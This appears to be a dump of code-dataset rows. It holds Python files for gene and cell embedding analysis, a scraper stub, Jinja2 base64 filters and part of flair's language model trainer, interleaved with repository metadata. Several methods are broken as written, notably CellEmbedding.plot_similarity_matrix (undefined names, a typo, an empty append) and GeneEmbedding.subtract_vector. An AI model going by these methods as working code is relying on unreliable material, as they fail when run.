if type(pcs) != numpy.ndarray:
if method == "TSNE":
print("Running t-SNE")
pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
print("Finished.")
else:
print("Running UMAP")
trans = umap.UMAP(random_state=42,metric='cosine').fit(self.matrix)
x = trans.embedding_[:, 0]
y = trans.embedding_[:, 1]
pcs = [x,y]
print("Finished.")
data = {"x":pcs[0],"y":pcs[1],"Cluster": clusters}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Cluster', ax=ax,linewidth=0.1,s=13,alpha=1.0)
return pcs
def plot(self, png=None, pcs=None, method="TSNE", column=None):
if column:
column_labels = dict(zip(self.context.cells,self.context.metadata[column]))
labels = []
for key in self.data.keys():
labels.append(column_labels[key])
else:
labels = self.clusters
plt.figure(figsize = (8, 8))
ax1 = plt.subplot(1,1,1)
pcs = self.plot_reduction(ax1, pcs=pcs, clusters=labels, method=method)
plt.xlabel("{}-1".format(method))
plt.ylabel("{}-2".format(method))
ax1.set_xticks([])
ax1.set_yticks([])
if png:
plt.savefig(png)
plt.close()
else:
plt.show()
return pcs
def plot_distance(self, vector, pcs=None):
plt.figure(figsize = (8,8))
ax = plt.subplot(1,1, 1)
if type(pcs) != numpy.ndarray:
pca = TSNE(n_components=2)
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
distances = []
dataset_distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(self.dataset_vector).reshape(1, -1))[0])
for cell_vector in self.matrix:
distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
distances.append(distance-dataset_distance)
data = {"x":pcs[0],"y":pcs[1],"Distance": distances}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Distance', ax=ax,linewidth=0.00,s=7,alpha=0.7)
return pcs
def plot_gene_tsne(self, title, ax, genes, pcs=None):
expression = [0 for _ in range(len(list(self.data.keys())))]
for gene in genes:
for i, cell in enumerate(self.data.keys()):
if gene in self.expression[cell]:
expression[i] += self.expression[cell][gene]
if type(pcs) != numpy.ndarray:
pca = TSNE(n_components=2)
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
data = {"x":pcs[0],"y":pcs[1],"Gene Expression": expression}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Gene Expression', ax=ax,linewidth=0.00,s=7,alpha=0.7)
ax.set_title(title,fontsize=16)
return pcs
def plot_gene_expression(self, genes, pcs=None, png=None):
plt.figure(figsize = (8,8))
ax = plt.subplot(1,1, 1)
pcs = self.plot_gene_tsne(",".join(genes[:10]), ax, genes, pcs=pcs)
ax.set_xticks([])
ax.set_yticks([])
if not png:
plt.show()
else:
plt.savefig(png)
plt.close()
return pcs
def plot_similarity_matrix(self, vectors, column):
similarity_matrix = []
plt.figure(figsize = (12, 10))
barcode_to_label = dict(zip(cembed.context.metadata.index, cembed.context.metadata[column]))
ctypes = cembed.group_cell_vectors()
matrix = []
clusters = list(vectors.keys())
celltypes = list(cytpes.keys())
for cluster, genes in vectors.items():
vector = embed.generate_vector(genes)
row = []
for cell in ctypes.keys():
distance = float(cosine_similarity(numpy.array(ctypes[cell]).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
row.append()
matrix.append(row)
matrix = numpy.array(matrix)
df = pandas.DataFrame(matrix,index=celltypes,columns=celltypes)
sns.clustermap(df,figsize=(17,8))
plt.tight_layout()
plt.savefig(os.path.join(output_path,"celltype_similarities_{}.png".format(sample))) | 41.693609 | 237 | 0.581939 | from sklearn.metrics.pairwise import cosine_similarity
from sklearn.manifold import TSNE
from sklearn.cluster import AgglomerativeClustering, KMeans
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
import matplotlib
import seaborn as sns
import pandas
import matplotlib.cm as cm
import umap
import tqdm
import scanpy as sc
import matplotlib.gridspec as gridspec
import networkx as nx
import numpy
import operator
import random
import pickle
import collections
import sys
import os
class GeneEmbedding(object):
def __init__(self, embedding_file, context):
self.vector = []
self.context = context
self.embedding_file = embedding_file
self.embeddings = self.read_embedding(self.embedding_file)
self.vector = []
self.genes = []
for gene in tqdm.tqdm(self.context.expressed_genes):
if gene in self.embeddings:
self.vector.append(self.embeddings[gene])
self.genes.append(gene)
def read_embedding(self, filename):
embedding = dict()
lines = open(filename,"r").read().splitlines()[1:]
for line in lines:
vector = line.split()
gene = vector.pop(0)
embedding[gene] = [float(x) for x in vector]
return embedding
def compute_similarities(self, gene, subset=None):
print("hit")
if gene not in self.embeddings:
return None
embedding = self.embeddings[gene]
distances = dict()
if subset:
targets = set(list(self.embeddings.keys())).intersection(set(subset))
else:
targets = list(self.embeddings.keys())
for target in targets:
if target not in self.embeddings:
continue
v = self.embeddings[target]
distance = float(cosine_similarity(numpy.array(embedding).reshape(1, -1),numpy.array(v).reshape(1, -1))[0])
distances[target] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
genes = [x[0] for x in sorted_distances]
distance = [x[1] for x in sorted_distances]
df = pandas.DataFrame.from_dict({"Gene":genes, "Similarity":distance})
return df
def cluster(self, n=12):
kmeans = KMeans(n_clusters=n)
kmeans.fit(self.vector)
clusters = kmeans.labels_
clusters = zip(self.context.expressed_genes, clusters)
_clusters = []
for gene, cluster in clusters:
_clusters.append("G"+str(cluster))
return _clusters
def clusters(self, clusters):
average_vector = dict()
gene_to_cluster = collections.defaultdict(list)
matrix = collections.defaultdict(list)
total_average_vector = []
for gene, cluster in zip(self.context.expressed_genes, clusters):
if gene in self.embeddings:
matrix[cluster].append(self.embeddings[gene])
gene_to_cluster[cluster].append(gene)
total_average_vector.append(self.embeddings[gene])
self.total_average_vector = list(numpy.average(total_average_vector, axis=0))
for cluster, vectors in matrix.items():
xvec = list(numpy.average(vectors, axis=0))
average_vector[cluster] = numpy.subtract(xvec,self.total_average_vector)
return average_vector, gene_to_cluster
def generate_vector(self, genes):
vector = []
for gene, vec in zip(self.genes, self.vector):
if gene in genes:
vector.append(vec)
return list(numpy.median(vector, axis=0))
def cluster_definitions(self, clusters):
average_vector, gene_to_cluster = self.clusters(clusters)
similarities = collections.defaultdict(dict)
for cluster, vector in average_vector.items():
distances = dict()
for target in gene_to_cluster[cluster]:
v = self.embeddings[target]
distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(v).reshape(1, -1))[0])
distances[target] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
similarities[cluster] = [x[0] for x in sorted_distances if x[0]]
return similarities
def cluster_definitions_as_df(self, similarities, top_n=20):
clusters = []
symbols = []
for key, genes in similarities.items():
clusters.append(key)
symbols.append(", ".join(genes[:top_n]))
df = pandas.DataFrame.from_dict({"Cluster Name":clusters, "Top Genes":symbols})
return df
def plot(self, clusters, png=None, method="TSNE", labels=[], pcs=None, remove=[]):
plt.figure(figsize = (8, 8))
ax = plt.subplot(1,1,1)
pcs = self.plot_reduction(clusters, ax, labels=labels, method=method, pcs=pcs, remove=remove)
if png:
plt.savefig(png)
plt.close()
else:
plt.show()
return pcs
def plot_reduction(self, clusters, ax, method="TSNE", labels=[], pcs=None, remove=[]):
if type(pcs) != numpy.ndarray:
if method == "TSNE":
print("Running t-SNE")
pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
pcs = pca.fit_transform(self.vector)
pcs = numpy.transpose(pcs)
print("Finished.")
else:
print("Running UMAP")
trans = umap.UMAP(random_state=42,metric='cosine').fit(self.vector)
x = trans.embedding_[:, 0]
y = trans.embedding_[:, 1]
pcs = [x,y]
print("Finished.")
if len(remove) != 0:
_pcsx = []
_pcsy = []
_clusters = []
for x, y, c in zip(pcs[0],pcs[1],clusters):
if c not in remove:
_pcsx.append(x)
_pcsy.append(y)
_clusters.append(c)
pcs = []
pcs.append(_pcsx)
pcs.append(_pcsy)
clusters = _clusters
data = {"x":pcs[0],"y":pcs[1], "Cluster":clusters}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y",hue="Cluster", ax=ax)
plt.xlabel("{}-1".format(method))
plt.ylabel("{}-2".format(method))
ax.set_xticks([])
ax.set_yticks([])
if len(labels):
for x, y, gene in zip(pcs[0], pcs[1], self.context.expressed_genes):
if gene in labels:
ax.text(x+.02, y, str(gene), fontsize=8)
return pcs
def subtract_vector(self, vector):
for gene, vec in self.embeddings.items():
vec = numpy.subtract(vec-vector)
self.embeddings[gene] = vec
@staticmethod
def relabel_cluster(similarities, clusters, old_label, new_label):
genes = similarities[old_label]
del similarities[old_label]
similarities[new_label] = genes
_clusters = []
for cluster in clusters:
if cluster == old_label:
_clusters.append(new_label)
else:
_clusters.append(cluster)
return similarities, _clusters
def plot_similarity_matrix(self, markers, marker_labels=None, png=None):
cmap = matplotlib.cm.tab20
if marker_labels:
marker_colors = {}
ctypes = []
for value in marker_labels.values():
ctypes.append(value)
ctypes = list(set(ctypes))
for key, value in marker_labels.items():
marker_colors[key] = cmap(ctypes.index(value))
colors = pandas.DataFrame(markers)[0].map(marker_colors)
similarity_matrix = []
print("Running")
markers = set(list(self.embeddings.keys())).intersection(set(markers))
markers = list(markers)
for marker in markers:
print(marker)
row = []
res = self.compute_similarities(marker, subset=markers)
resdict = dict(zip(res["Gene"],res["Similarity"]))
for gene in markers:
row.append(resdict[gene])
similarity_matrix.append(row)
plt.figure(figsize = (12, 10))
matrix = numpy.array(similarity_matrix)
df = pandas.DataFrame(matrix,index=markers,columns=markers)
sns.clustermap(df,figsize=(12,8), dendrogram_ratio=0.1)
plt.tight_layout()
if png:
plt.savefig("marker_similarity.png")
else:
plt.show()
def plot_similarity_network(self, markers, marker_labels=None, png=None):
cmap = matplotlib.cm.tab20
G = nx.petersen_graph()
node_color = []
node_order = []
node_size = []
edge_order = []
edge_color = []
edge_labels = dict()
for marker in markers:
node_order.append(marker)
if marker_labels:
ctypes = []
for value in marker_labels.values():
ctypes.append(value)
ctypes = list(set(ctypes))
node_color.append(ctypes.index(marker_labels[marker]))
node_size.append(400)
G.add_node(marker)
for marker in markers:
res = self.compute_similarities(marker)
resdict = dict(zip(res["Gene"],res["Similarity"]))
i = 0
for gene, similarity in resdict.items():
if i > 9: break
if gene != marker:
if gene not in G.nodes():
node_size.append(0)
G.add_node(gene)
node_order.append(gene)
node_color.append(len(set(marker_labels.values())))
print(marker, gene)
G.add_edge(marker, gene, weight=similarity)
edge_color.append(similarity)
edge_order.append((marker,gene))
edge_labels[(marker,gene)] = str(round(similarity,2))
i += 1
for i in range(10):
G.remove_node(i)
print(G.nodes())
print(G.edges())
fig = plt.figure(figsize=(8,8))
ax = plt.subplot(1,1,1)
pos = nx.nx_agraph.graphviz_layout(G, prog="neato",args="-Goverlap=scale -Elen=5 -Eweight=0.2")
nx.draw(G,pos,ax=ax, cmap=cmap,nodelist=node_order, node_size=node_size,edgelist=edge_order, node_color=node_color, edge_color=edge_color, edge_vmin=0, edge_vmax=1.0, edge_cmap=plt.cm.Greys, with_labels=True, width=1,font_size=7)
nx.draw_networkx_edge_labels(G,pos,edge_labels=edge_labels, font_size=6)
plt.axis('off')
plt.tight_layout()
if png:
plt.savefig(png)
else:
plt.show()
class CellEmbedding(object):
def __init__(self, context, embed):
cell_to_gene = list(context.cell_to_gene.items())
self.context = context
self.embed = embed
self.expression = context.expression
self.data = collections.defaultdict(list)
self.weights = collections.defaultdict(list)
for cell, genes in tqdm.tqdm(cell_to_gene):
if len(genes) < 2: continue
if cell in self.expression:
cell_weights = self.expression[cell]
for gene in set(genes).intersection(set(embed.embeddings.keys())):
if gene in cell_weights:
weight = self.expression[cell][gene]
if weight > 0:
self.data[cell].append(embed.embeddings[gene])
self.weights[cell].append(weight)
self.matrix = []
dataset_vector = []
for cell, vectors in self.data.items():
weights = self.weights[cell]
xvec = list(numpy.average(vectors, axis=0, weights=weights))
self.matrix.append(xvec)
dataset_vector += vectors
self.dataset_vector = numpy.average(dataset_vector, axis=0)
_matrix = []
for vec in self.matrix:
_matrix.append(numpy.subtract(vec, self.dataset_vector))
self.matrix = _matrix
def batch_correct(self, column=None, clusters=None):
if not column or not clusters:
raise ValueError("Must supply batch column and clusters!")
column_labels = dict(zip(self.context.cells,self.context.metadata[column]))
labels = []
for key in self.data.keys():
labels.append(column_labels[key])
local_correction = collections.defaultdict(lambda : collections.defaultdict(list))
correction_vectors = collections.defaultdict(dict)
for cluster, batch, vec in zip(clusters, labels, self.matrix):
local_correction[cluster][batch].append(vec)
for cluster, batches in local_correction.items():
cluster_vec = []
batch_keys = list(batches.keys())
base_batch = batch_keys.pop(0)
max_distance = 1.0
cluster_vec = numpy.average(batches[base_batch], axis=0)
for batch in batch_keys:
bvec = list(numpy.average(batches[batch], axis=0))
distance = float(cosine_similarity(numpy.array(bvec).reshape(1, -1),numpy.array(cluster_vec).reshape(1, -1))[0])
if max_distance > distance:
max_distance = distance
offset = numpy.subtract(cluster_vec,bvec)
bvec = numpy.add(bvec,offset)
distance = float(cosine_similarity(numpy.array(bvec).reshape(1, -1),numpy.array(cluster_vec).reshape(1, -1))[0])
correction_vectors[cluster][batch] = offset
self.matrix = []
self.sample_vector = collections.defaultdict(list)
i = 0
self.cell_order = []
for cell, vectors in self.data.items():
cluster = clusters[i]
xvec = list(numpy.average(vectors, axis=0))
batch = column_labels[cell]
if cluster in correction_vectors and batch in correction_vectors[cluster]:
offset = correction_vectors[cluster][batch]
xvec = numpy.add(xvec,offset)
self.matrix.append(xvec)
self.cell_order.append(cell)
i += 1
def cluster(self, k=12):
kmeans = KMeans(n_clusters=k)
kmeans.fit(self.matrix)
clusters = kmeans.labels_
_clusters = []
for cluster in clusters:
_clusters.append("C"+str(cluster))
self.clusters = _clusters
return _clusters
def subtract_vector(self, vector):
corrected_matrix = []
for cell_vector in self.matrix:
corrected_matrix.append(numpy.subtract(cell_vector, vector))
self.matrix = corrected_matrix
def compute_gene_similarities(self):
gene_similarities = dict()
vectors = collections.defaultdict(list)
for vec, label in zip(self.matrix, self.clusters):
vectors[label].append(vec)
for label, vecs in vectors.items():
distances = dict()
cell_vector = list(numpy.mean(vecs, axis=0))
for gene, vector in self.embed.embeddings.items():
distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
distances[gene] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
gene_similarities[label] = [x[0] for x in sorted_distances]
print(label, sorted_distances[:10])
return gene_similarities
def group_cell_vectors(self, barcode_to_label):
label_vector = dict()
labels = []
for cell, vectors in self.data.items():
vector = list(numpy.median(vectors, axis=0))
labels.append(barcode_to_label[cell])
label_vector[barcode_to_label[cell]] = vector
for cell, vectors in self.data.items():
_vectors = []
for vector in vectors:
_vectors.append(numpy.subtract(vector, label_vector[barcode_to_label[cell]]))
vectors = _vectors
vector = list(numpy.median(vectors, axis=0))
label_vector[barcode_to_label[cell]] = vector
return label_vector, labels
def compute_cell_similarities(self, barcode_to_label):
vectors = dict()
cell_similarities = dict()
vectors, labels = self.group_cell_vectors(barcode_to_label)
for label, vector in vectors.items():
distances = dict()
for label2, vector2 in vectors.items():
xdist = []
distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(vector2).reshape(1, -1))[0])
xdist.append(distance)
distances[label2] = distance
cell_similarities[label] = distances
return cell_similarities
def plot_reduction(self, ax, pcs=None, method="TSNE", clusters=None, labels=None):
if type(pcs) != numpy.ndarray:
if method == "TSNE":
print("Running t-SNE")
pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
print("Finished.")
else:
print("Running UMAP")
trans = umap.UMAP(random_state=42,metric='cosine').fit(self.matrix)
x = trans.embedding_[:, 0]
y = trans.embedding_[:, 1]
pcs = [x,y]
print("Finished.")
data = {"x":pcs[0],"y":pcs[1],"Cluster": clusters}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Cluster', ax=ax,linewidth=0.1,s=13,alpha=1.0)
return pcs
def plot(self, png=None, pcs=None, method="TSNE", column=None):
if column:
column_labels = dict(zip(self.context.cells,self.context.metadata[column]))
labels = []
for key in self.data.keys():
labels.append(column_labels[key])
else:
labels = self.clusters
plt.figure(figsize = (8, 8))
ax1 = plt.subplot(1,1,1)
pcs = self.plot_reduction(ax1, pcs=pcs, clusters=labels, method=method)
plt.xlabel("{}-1".format(method))
plt.ylabel("{}-2".format(method))
ax1.set_xticks([])
ax1.set_yticks([])
if png:
plt.savefig(png)
plt.close()
else:
plt.show()
return pcs
def plot_distance(self, vector, pcs=None):
plt.figure(figsize = (8,8))
ax = plt.subplot(1,1, 1)
if type(pcs) != numpy.ndarray:
pca = TSNE(n_components=2)
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
distances = []
dataset_distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(self.dataset_vector).reshape(1, -1))[0])
for cell_vector in self.matrix:
distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
distances.append(distance-dataset_distance)
data = {"x":pcs[0],"y":pcs[1],"Distance": distances}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Distance', ax=ax,linewidth=0.00,s=7,alpha=0.7)
return pcs
def plot_gene_tsne(self, title, ax, genes, pcs=None):
expression = [0 for _ in range(len(list(self.data.keys())))]
for gene in genes:
for i, cell in enumerate(self.data.keys()):
if gene in self.expression[cell]:
expression[i] += self.expression[cell][gene]
if type(pcs) != numpy.ndarray:
pca = TSNE(n_components=2)
pcs = pca.fit_transform(self.matrix)
pcs = numpy.transpose(pcs)
data = {"x":pcs[0],"y":pcs[1],"Gene Expression": expression}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y", hue='Gene Expression', ax=ax,linewidth=0.00,s=7,alpha=0.7)
ax.set_title(title,fontsize=16)
return pcs
def plot_gene_expression(self, genes, pcs=None, png=None):
plt.figure(figsize = (8,8))
ax = plt.subplot(1,1, 1)
pcs = self.plot_gene_tsne(",".join(genes[:10]), ax, genes, pcs=pcs)
ax.set_xticks([])
ax.set_yticks([])
if not png:
plt.show()
else:
plt.savefig(png)
plt.close()
return pcs
def plot_similarity_matrix(self, vectors, column):
similarity_matrix = []
plt.figure(figsize = (12, 10))
barcode_to_label = dict(zip(cembed.context.metadata.index, cembed.context.metadata[column]))
ctypes = cembed.group_cell_vectors()
matrix = []
clusters = list(vectors.keys())
celltypes = list(cytpes.keys())
for cluster, genes in vectors.items():
vector = embed.generate_vector(genes)
row = []
for cell in ctypes.keys():
distance = float(cosine_similarity(numpy.array(ctypes[cell]).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
row.append()
matrix.append(row)
matrix = numpy.array(matrix)
df = pandas.DataFrame(matrix,index=celltypes,columns=celltypes)
sns.clustermap(df,figsize=(17,8))
plt.tight_layout()
plt.savefig(os.path.join(output_path,"celltype_similarities_{}.png".format(sample))) | true | true |
f7327fac62add1269af1efbeb3c9b14e1e8be449 | 92 | py | Python | scraper/__main__.py | isareds/Ateco-Codes-Scraper | 9b1e714c2e0ebaa9f2a3ca563099bc739c9d7ac5 | [
"BSD-2-Clause"
] | null | null | null | scraper/__main__.py | isareds/Ateco-Codes-Scraper | 9b1e714c2e0ebaa9f2a3ca563099bc739c9d7ac5 | [
"BSD-2-Clause"
] | null | null | null | scraper/__main__.py | isareds/Ateco-Codes-Scraper | 9b1e714c2e0ebaa9f2a3ca563099bc739c9d7ac5 | [
"BSD-2-Clause"
] | null | null | null | from scraper import scrape
def main():
scrape()
if __name__ == '__main__':
main()
| 11.5 | 26 | 0.630435 | from scraper import scrape
def main():
scrape()
if __name__ == '__main__':
main()
| true | true |
f7328057087962ad9e6c08863139837e1f659948 | 5,366 | py | Python | docker/files/j2-filters.py | bihealth/irods-docker | 7f02be3f027e4606de56a85bc27d05b11bac736c | [
"MIT"
] | null | null | null | docker/files/j2-filters.py | bihealth/irods-docker | 7f02be3f027e4606de56a85bc27d05b11bac736c | [
"MIT"
] | 7 | 2021-10-08T09:19:12.000Z | 2022-03-29T15:22:06.000Z | docker/files/j2-filters.py | bihealth/irods-docker | 7f02be3f027e4606de56a85bc27d05b11bac736c | [
"MIT"
] | null | null | null | # NOTE: These are taken from the jinja2-ansible-filters package:
# NOTE: https://pypi.org/project/jinja2-ansible-filters
# NOTE: The installer has a problem in its egg-info preventing a regular pip install.
# NOTE: If we do not need the b64encode filter, we can omit this file and the filter setup.
# (c) 2012, Jeroen Hoekx <jeroen@hoekx.be>
#
# This file was ported from Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import codecs
try:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
from collections import Sequence
except NameError:
# Python3.x environment
string_types = str
integer_types = int
class_types = type
text_type = str
binary_type = bytes
try:
codecs.lookup_error("surrogateescape")
HAS_SURROGATEESCAPE = True
except LookupError:
HAS_SURROGATEESCAPE = False
_COMPOSED_ERROR_HANDLERS = frozenset((None, "surrogate_or_replace",
"surrogate_or_strict",
"surrogate_then_replace"))
def to_bytes(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
if isinstance(obj, binary_type):
return obj
# We're given a text string
# If it has surrogates, we know because it will decode
original_errors = errors
if errors in _COMPOSED_ERROR_HANDLERS:
if HAS_SURROGATEESCAPE:
errors = "surrogateescape"
elif errors == "surrogate_or_strict":
errors = "strict"
else:
errors = "replace"
if isinstance(obj, text_type):
try:
# Try this first as it's the fastest
return obj.encode(encoding, errors)
except UnicodeEncodeError:
if original_errors in (None, "surrogate_then_replace"):
# Slow but works
return_string = obj.encode("utf-8", "surrogateescape")
return_string = return_string.decode("utf-8", "replace")
return return_string.encode(encoding, "replace")
raise
# Note: We do these last even though we have to call to_bytes again on the
# value because we're optimizing the common case
if nonstring == "simplerepr":
try:
value = str(obj)
except UnicodeError:
try:
value = repr(obj)
except UnicodeError:
# Giving up
return to_bytes("")
elif nonstring == "passthru":
return obj
elif nonstring == "empty":
# python2.4 doesn't have b''
return to_bytes("")
elif nonstring == "strict":
raise TypeError("obj must be a string type")
else:
raise TypeError(
"Invalid value %s for to_bytes' nonstring parameter" % nonstring)
return to_bytes(value, encoding, errors)
def to_text(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
if isinstance(obj, text_type):
return obj
if errors in _COMPOSED_ERROR_HANDLERS:
if HAS_SURROGATEESCAPE:
errors = "surrogateescape"
elif errors == "surrogate_or_strict":
errors = "strict"
else:
errors = "replace"
if isinstance(obj, binary_type):
# Note: We don't need special handling for surrogate_then_replace
# because all bytes will either be made into surrogates or are valid
# to decode.
return obj.decode(encoding, errors)
# Note: We do these last even though we have to call to_text again on the
# value because we're optimizing the common case
if nonstring == "simplerepr":
try:
value = str(obj)
except UnicodeError:
try:
value = repr(obj)
except UnicodeError:
# Giving up
return u""
elif nonstring == "passthru":
return obj
elif nonstring == "empty":
return u""
elif nonstring == "strict":
raise TypeError("obj must be a string type")
else:
raise TypeError(
"Invalid value %s for to_text's nonstring parameter" % nonstring)
return to_text(value, encoding, errors)
def b64encode(string, encoding="utf-8"):
return to_text(base64.b64encode(to_bytes(string,
encoding=encoding,
errors="surrogate_or_strict")))
class FilterModule(object):
""" Ansible core jinja2 filters """
def filters(self):
return {
# base 64
"b64encode": b64encode,
}
| 32.521212 | 91 | 0.62691 |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import codecs
try:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
from collections import Sequence
except NameError:
string_types = str
integer_types = int
class_types = type
text_type = str
binary_type = bytes
try:
codecs.lookup_error("surrogateescape")
HAS_SURROGATEESCAPE = True
except LookupError:
HAS_SURROGATEESCAPE = False
_COMPOSED_ERROR_HANDLERS = frozenset((None, "surrogate_or_replace",
"surrogate_or_strict",
"surrogate_then_replace"))
def to_bytes(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
if isinstance(obj, binary_type):
return obj
# If it has surrogates, we know because it will decode
original_errors = errors
if errors in _COMPOSED_ERROR_HANDLERS:
if HAS_SURROGATEESCAPE:
errors = "surrogateescape"
elif errors == "surrogate_or_strict":
errors = "strict"
else:
errors = "replace"
if isinstance(obj, text_type):
try:
# Try this first as it's the fastest
return obj.encode(encoding, errors)
except UnicodeEncodeError:
if original_errors in (None, "surrogate_then_replace"):
return_string = obj.encode("utf-8", "surrogateescape")
return_string = return_string.decode("utf-8", "replace")
return return_string.encode(encoding, "replace")
raise
if nonstring == "simplerepr":
try:
value = str(obj)
except UnicodeError:
try:
value = repr(obj)
except UnicodeError:
# Giving up
return to_bytes("")
elif nonstring == "passthru":
return obj
elif nonstring == "empty":
# python2.4 doesn't have b''
return to_bytes("")
elif nonstring == "strict":
raise TypeError("obj must be a string type")
else:
raise TypeError(
"Invalid value %s for to_bytes' nonstring parameter" % nonstring)
return to_bytes(value, encoding, errors)
def to_text(obj, encoding="utf-8", errors=None, nonstring="simplerepr"):
if isinstance(obj, text_type):
return obj
if errors in _COMPOSED_ERROR_HANDLERS:
if HAS_SURROGATEESCAPE:
errors = "surrogateescape"
elif errors == "surrogate_or_strict":
errors = "strict"
else:
errors = "replace"
if isinstance(obj, binary_type):
# Note: We don't need special handling for surrogate_then_replace
return obj.decode(encoding, errors)
if nonstring == "simplerepr":
try:
value = str(obj)
except UnicodeError:
try:
value = repr(obj)
except UnicodeError:
# Giving up
return u""
elif nonstring == "passthru":
return obj
elif nonstring == "empty":
return u""
elif nonstring == "strict":
raise TypeError("obj must be a string type")
else:
raise TypeError(
"Invalid value %s for to_text's nonstring parameter" % nonstring)
return to_text(value, encoding, errors)
def b64encode(string, encoding="utf-8"):
return to_text(base64.b64encode(to_bytes(string,
encoding=encoding,
errors="surrogate_or_strict")))
class FilterModule(object):
def filters(self):
return {
"b64encode": b64encode,
}
| true | true |
f7328081f748a48e3cf5d90ec0297525e64a80a6 | 15,124 | py | Python | flair/trainers/language_model_trainer.py | azawalich/flair | f0101ab25381aefa586ecb688d4f412d5fab5de3 | [
"MIT"
] | null | null | null | flair/trainers/language_model_trainer.py | azawalich/flair | f0101ab25381aefa586ecb688d4f412d5fab5de3 | [
"MIT"
] | null | null | null | flair/trainers/language_model_trainer.py | azawalich/flair | f0101ab25381aefa586ecb688d4f412d5fab5de3 | [
"MIT"
] | null | null | null |
import time
import datetime
import random
import sys
import logging
from pathlib import Path
from typing import Union
from torch import cuda
from torch.utils.data import Dataset, DataLoader
from torch.optim.sgd import SGD
try:
from apex import amp
except ImportError:
amp = None
import flair
from flair.data import Dictionary
from flair.models import LanguageModel
from flair.optim import *
from flair.training_utils import add_file_handler
log = logging.getLogger('flair')
class TextDataset(Dataset):
def __init__(self, path, dictionary, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True, shuffle_lines=True):
assert path.exists()
self.files = None
self.path = path
self.dictionary = dictionary
self.split_on_char = split_on_char
self.forward = forward
self.random_case_flip = random_case_flip
self.expand_vocab = expand_vocab
self.shuffle_lines = shuffle_lines
if path.is_dir():
self.files = sorted([f for f in path.iterdir() if f.exists()])
else:
self.files = [path]
def __len__(self):
return len(self.files)
def __getitem__(self, index=0):
return self.charsplit(self.files[index], self.expand_vocab, self.forward, self.split_on_char, self.random_case_flip)
def charsplit(self, path, expand_vocab=False, forward=True, split_on_char=True, random_case_flip=True):
'Tokenizes a text file on character basis.'
assert path.exists()
lines = open(path, 'r', encoding='utf-8').readlines()
log.info(
''.join(['read text file with ', '{}'.format(len(lines)), ' lines']))
if self.shuffle_lines:
random.shuffle(lines)
log.info('shuffled')
tokens = 0
for line in lines:
if split_on_char:
chars = list(line)
else:
chars = line.split()
tokens += len(chars)
if expand_vocab:
for char in chars:
self.dictionary.add_item(char)
ids = torch.zeros(tokens, dtype=torch.long)
if forward:
token = 0
for line in lines:
if random_case_flip:
line = self.random_casechange(line)
if split_on_char:
chars = list(line)
else:
chars = line.split()
for char in chars:
if (token >= tokens):
break
ids[token] = self.dictionary.get_idx_for_item(char)
token += 1
else:
token = (tokens - 1)
for line in lines:
if random_case_flip:
line = self.random_casechange(line)
if split_on_char:
chars = list(line)
else:
chars = line.split()
for char in chars:
if (token >= tokens):
break
ids[token] = self.dictionary.get_idx_for_item(char)
token -= 1
return ids
@staticmethod
def random_casechange(line):
no = random.randint(0, 99)
if (no is 0):
line = line.lower()
if (no is 1):
line = line.upper()
return line
def tokenize(self, path):
'Tokenizes a text file.'
assert path.exists()
with open(path, 'r') as f:
tokens = 0
for line in f:
words = (line.split() + ['<eos>'])
tokens += len(words)
for word in words:
self.dictionary.add_word(word)
with open(path, 'r') as f:
ids = torch.zeros(tokens, dtype=torch.long, device=flair.device)
token = 0
for line in f:
words = (line.split() + ['<eos>'])
for word in words:
ids[token] = self.dictionary.word2idx[word]
token += 1
return ids
class TextCorpus(object):
def __init__(self, path, dictionary, forward=True, character_level=True, random_case_flip=True, shuffle_lines=True):
